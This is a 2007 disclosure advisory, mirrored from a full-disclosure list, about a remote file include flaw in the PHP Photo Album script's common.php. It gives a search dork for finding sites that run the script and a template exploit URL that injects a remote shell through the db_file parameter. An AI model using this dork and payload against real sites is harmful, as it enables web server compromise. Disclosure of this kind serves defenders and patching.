Computer Security

Security Advisory: Remote File Include In Script PHP Photo Album
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Fantastico In all Version Cpanel 10.x <= local File Include

  AssetMan 2.4a <= (download_pdf.
php) Remote File Disclosure Vulnerability

  [Full-disclosure] TinyMCE_exp Remote File Include Vulnerability

  Wiki Remote Authentication Bypass Vulnerability

From:RaeD Hasadya <raed_(at)_bsdmail.com>
Date:12.03.2007
Subject:Remote File Include In Script PHP Photo Album

By Hasadya Raed
Contact : RaeD@BsdMail.Com
---------------------------------------------------------------------------------
----
Script : PHP Photo Album
Dork : "Powered by PHP Photo Album"
---------------------------------------------------------------------------------
----
B.File :
common.php
---------------------------------------------------------------------------------
-----
Exploit :
http://www.Victim.com/Path_Script/common.php?db_file=[Shell-Attack]



--
_______________________________________________
Get your free email from http://bsdmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru